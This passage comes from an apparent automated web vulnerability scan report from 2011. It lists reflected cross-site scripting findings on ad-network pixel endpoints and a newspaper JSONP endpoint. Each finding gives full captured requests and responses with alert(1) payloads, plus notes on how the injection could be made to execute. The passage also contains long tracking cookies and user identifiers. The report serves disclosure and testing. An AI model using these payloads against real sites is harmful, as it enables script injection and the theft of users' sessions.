Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; 
segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="...[SNIP]..."

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 01:34:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 01:33:40 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/6a53e"><script>alert(1)</script>e268ea4feb8?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1298079240"/>
...[SNIP]...

1.248. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the src attribute of a hidden iframe (the turn_sync_frame pointing at cdn.turn.com/server/ddc.htm), enclosed in double quotation marks. The payload 80a96"><script>alert(1)</script>331949a0040 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof of concept demonstrates that the parameter can close the attribute and the iframe start tag, so arbitrary markup can be injected into the application's response. One caveat on the payload as submitted: an HTML5 parser treats everything between an iframe start tag and its end tag as raw text, so the script element placed directly after the "> is not executed as shown; executing code from this injection point requires an </iframe> end tag ahead of the script element, or an event-handler attribute injected into the iframe tag itself. The reflection is unambiguous either way, which is what the Certain rating records.

Request

GET /server/pixel.htm?fpid=80a96"><script>alert(1)</script>331949a0040&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX
2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 
pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15019%7C15018%7C15018%7C15018%7C15018%7C15019%7C15019%7C14983%7C15019%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 02:34:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:34:41 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8838840790338793450&fpid=80a96"><script>alert(1)</script>331949a0040&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.249. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the src attribute of the same hidden iframe (turn_sync_frame, pointing at cdn.turn.com/server/ddc.htm), enclosed in double quotation marks. The payload 759fc"><script>alert(1)</script>eda4d1587f5 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof of concept demonstrates that the parameter can close the attribute and the iframe start tag. As with fpid, an HTML5 parser reads the content of an iframe element as raw text, so the script element in this exact payload does not execute; the injection point itself is real, since the closed attribute allows further attributes on the iframe tag, or an </iframe> end tag before any script element.

Request

GET /server/pixel.htm?fpid=4&sp=759fc"><script>alert(1)</script>eda4d1587f5&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX
2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 
pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15019%7C15018%7C15018%7C15018%7C15018%7C15019%7C15019%7C14983%7C15019%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 02:34:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:34:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3324908302978229243&fpid=4&nu=n&t=&sp=759fc"><script>alert(1)</script>eda4d1587f5&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.250. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied unmodified into the response as the name of the JSONP callback, directly in front of the function call. The payload 4bc88<script>alert(1)</script>6ade5d8e487 was submitted in the cb parameter and was echoed without any filtering. The context is JavaScript rather than HTML: the response is served as application/javascript, and when a page loads it through <script src> an injected <script> tag is not markup but a syntax error that aborts the whole response. The reflection is still a defect, because the callback name is attacker-chosen JavaScript source, and because a browser that sniffs the body, or is otherwise persuaded to render it as a document, would execute the tag. The endpoint should accept only identifier-shaped callback names and send X-Content-Type-Options: nosniff.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb04bc88<script>alert(1)</script>6ade5d8e487 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
